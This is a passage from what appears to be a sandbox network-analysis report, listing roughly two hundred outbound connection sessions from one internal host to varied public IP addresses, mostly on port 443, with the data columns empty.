                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18790192.168.2.235567438.133.171.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18791192.168.2.236060251.23.1.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18792192.168.2.235810851.239.242.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18793192.168.2.2341914222.68.11.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18794192.168.2.2347200143.225.166.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18795192.168.2.2343630161.26.30.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18796192.168.2.234781897.154.165.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18797192.168.2.2335834210.208.252.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18798192.168.2.233392895.77.168.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18799192.168.2.2346882149.201.30.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18800192.168.2.2359666207.208.201.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18801192.168.2.235341023.137.143.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18802192.168.2.2336004198.37.90.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18803192.168.2.234682414.109.216.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18804192.168.2.235607095.67.135.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18805192.168.2.2340472147.247.212.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18806192.168.2.234562231.83.34.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18807192.168.2.235114878.222.35.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18808192.168.2.2358426171.209.110.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18809192.168.2.2339468131.122.253.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18810192.168.2.235622235.144.105.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18811192.168.2.2346276177.155.186.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18812192.168.2.233745289.185.94.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18813192.168.2.235059472.201.21.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18814192.168.2.234019224.247.223.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18815192.168.2.2358352179.239.254.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18816192.168.2.235409095.172.5.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18817192.168.2.235412623.224.251.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18818192.168.2.234434023.82.88.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18819192.168.2.2356132129.193.93.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18820192.168.2.2336494100.220.162.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18821192.168.2.235850492.235.200.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18822192.168.2.2358868128.198.34.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18823192.168.2.2340202177.209.8.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18824192.168.2.2351706157.150.73.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18825192.168.2.2358810205.148.6.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18826192.168.2.2348624109.18.94.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18827192.168.2.2339170163.234.130.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18828192.168.2.2353996183.22.121.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18829192.168.2.233566494.234.210.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18830192.168.2.235688642.131.85.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18831192.168.2.23576325.76.13.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18832192.168.2.2352802150.187.4.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18833192.168.2.233992660.197.24.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18834192.168.2.2342120211.82.67.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18835192.168.2.2344778125.114.167.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18836192.168.2.2345982128.108.189.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18837192.168.2.234171652.147.180.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18838192.168.2.235559662.18.100.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18839192.168.2.233631653.29.149.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18840192.168.2.234903070.166.157.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18841192.168.2.235399419.147.24.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18842192.168.2.236006035.244.8.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18843192.168.2.2348342112.130.122.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18844192.168.2.2350156108.242.157.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18845192.168.2.2342608204.194.127.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18846192.168.2.2359054164.182.215.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18847192.168.2.234687414.114.233.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18848192.168.2.2350218213.138.251.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18849192.168.2.233871079.128.242.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18850192.168.2.235726419.67.208.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18851192.168.2.23468088.142.232.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18852192.168.2.2343960176.173.144.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18853192.168.2.23398321.21.3.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18854192.168.2.235415437.127.151.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18855192.168.2.234691859.4.100.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18856192.168.2.234122292.162.133.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18857192.168.2.2345148195.210.134.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18858192.168.2.2358710154.199.35.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18859192.168.2.2352272178.61.217.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18860192.168.2.234576278.196.22.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18861192.168.2.235866841.128.52.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18862192.168.2.2346588167.210.113.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18863192.168.2.235912014.27.110.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18864192.168.2.233358283.229.191.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18865192.168.2.235482827.0.35.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18866192.168.2.234507669.179.209.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18867192.168.2.235142086.200.141.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18868192.168.2.2356208133.52.189.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18869192.168.2.235632088.42.228.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18870192.168.2.2350468163.245.93.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18871192.168.2.233872266.179.147.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18872192.168.2.2339524108.112.168.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18873192.168.2.2356212155.198.169.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18874192.168.2.235179814.12.206.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18875192.168.2.2347238195.92.251.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18876192.168.2.233588094.78.168.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18877192.168.2.234647894.15.225.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18878192.168.2.2350970194.58.237.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18879192.168.2.2336436105.45.55.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18880192.168.2.2346248107.136.107.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18881192.168.2.2350670145.86.141.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18882192.168.2.2348384106.133.199.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18883192.168.2.233310035.74.23.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18884192.168.2.235111859.2.66.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18885192.168.2.2345078184.95.201.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18886192.168.2.2341564100.13.209.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18887192.168.2.2341160162.5.91.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18888192.168.2.235878054.165.192.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18889192.168.2.234579443.237.239.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18890192.168.2.234518283.213.241.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18891192.168.2.2343360188.99.114.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18892192.168.2.2343588212.15.10.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18893192.168.2.2338600172.77.23.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18894192.168.2.2342588191.88.99.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18895192.168.2.233756879.3.40.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18896192.168.2.2343368185.90.54.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18897192.168.2.23514085.65.57.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18898192.168.2.235139617.146.252.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18899192.168.2.2347324219.228.192.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18900192.168.2.235008034.165.24.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18901192.168.2.2340752157.43.66.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18902192.168.2.233339812.3.139.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18903192.168.2.235094438.93.133.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18904192.168.2.2355488154.61.116.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18905192.168.2.2346302118.226.208.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18906192.168.2.234582091.231.47.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18907192.168.2.235844462.229.34.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18908192.168.2.2350146207.169.125.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18909192.168.2.235675470.79.203.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18910192.168.2.233844844.139.177.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18911192.168.2.23360589.246.207.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18912192.168.2.234061688.175.149.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18913192.168.2.234066873.8.182.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18914192.168.2.234886019.166.57.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18915192.168.2.234428234.213.171.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18916192.168.2.2346964213.215.96.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18917192.168.2.23552084.238.16.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18918192.168.2.2356094200.130.25.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18919192.168.2.2342598161.226.25.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18920192.168.2.234562078.234.193.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18921192.168.2.2340676118.38.167.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18922192.168.2.234371414.87.141.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18923192.168.2.2349362187.174.177.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18924192.168.2.2344966205.241.141.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18925192.168.2.2343738113.86.3.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18926192.168.2.2348432197.231.183.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18927192.168.2.234604295.115.178.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18928192.168.2.2355466108.116.186.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18929192.168.2.2352928207.249.1.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18930192.168.2.233606878.43.115.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18931192.168.2.2359272204.166.167.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18932192.168.2.233337454.33.64.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18933192.168.2.235761673.219.87.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18934192.168.2.2337788131.68.111.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18935192.168.2.2350748170.202.182.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18936192.168.2.235610427.95.31.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18937192.168.2.234678450.230.240.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18938192.168.2.2347324123.238.54.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18939192.168.2.2351428195.245.106.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18940192.168.2.2350190211.124.177.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18941192.168.2.2359906118.216.234.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18942192.168.2.234929098.49.156.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18943192.168.2.2355916118.58.51.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18944192.168.2.234328464.6.244.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18945192.168.2.234022431.130.233.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18946192.168.2.2344942135.114.5.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18947192.168.2.233872089.147.29.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18948192.168.2.235784813.74.33.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18949192.168.2.2351678135.172.164.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18950192.168.2.2358808103.190.89.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18951192.168.2.2355396218.11.49.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18952192.168.2.2335640131.240.193.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18953192.168.2.235740290.92.156.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18954192.168.2.2339114200.30.82.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18955192.168.2.234424074.29.45.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18956192.168.2.234884035.244.197.878080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18957192.168.2.233592085.58.197.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18958192.168.2.2345504143.111.60.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18959192.168.2.23333441.230.188.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18960192.168.2.2337258103.167.251.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18961192.168.2.233300695.73.40.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18962192.168.2.234980691.135.29.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18963192.168.2.235669867.33.85.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18964192.168.2.2359072106.194.227.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18965192.168.2.233639096.184.218.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18966192.168.2.2353240120.62.147.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18967192.168.2.2333312167.23.8.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18968192.168.2.234702896.68.139.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18969192.168.2.2347868203.237.11.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18970192.168.2.234251057.224.221.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18971192.168.2.2340956163.1.192.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18972192.168.2.234517032.88.93.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18973192.168.2.2350086212.119.151.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18974192.168.2.2341042110.236.168.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18975192.168.2.233749860.71.45.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18976192.168.2.2339452154.230.10.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18977192.168.2.2338066205.160.2.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18978192.168.2.2345538180.213.41.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18979192.168.2.233546649.128.59.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18980192.168.2.2353586122.2.222.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18981192.168.2.235974468.2.187.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18982192.168.2.234390695.51.230.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18983192.168.2.233981027.138.130.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18984192.168.2.233447283.126.163.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18985192.168.2.235465834.2.96.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18986192.168.2.2334238153.242.163.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18987192.168.2.235734895.143.160.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18988192.168.2.2354036130.176.26.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18989192.168.2.234098620.184.171.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18990192.168.2.234341284.174.70.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18991192.168.2.2347322221.229.111.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18992192.168.2.2354804140.55.228.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18993192.168.2.2349740148.93.22.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18994192.168.2.233338491.76.96.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18995192.168.2.234088423.126.228.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18996192.168.2.2351712181.234.125.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18997192.168.2.2360496165.37.227.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18998192.168.2.234517857.5.118.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18999192.168.2.2340330156.254.166.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19000192.168.2.2335674210.41.14.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19001192.168.2.235756265.49.67.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19002192.168.2.2334704171.46.131.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19003192.168.2.234184637.33.126.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19004192.168.2.2345734167.56.125.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19005192.168.2.233280086.136.188.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19006192.168.2.235471090.93.225.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19007192.168.2.2352246149.164.2.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19008192.168.2.233717871.11.189.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19009192.168.2.2337554109.168.95.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19010192.168.2.2350736133.181.25.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19011192.168.2.2352696171.96.19.186443
                                            TimestampBytes transferredDirectionData


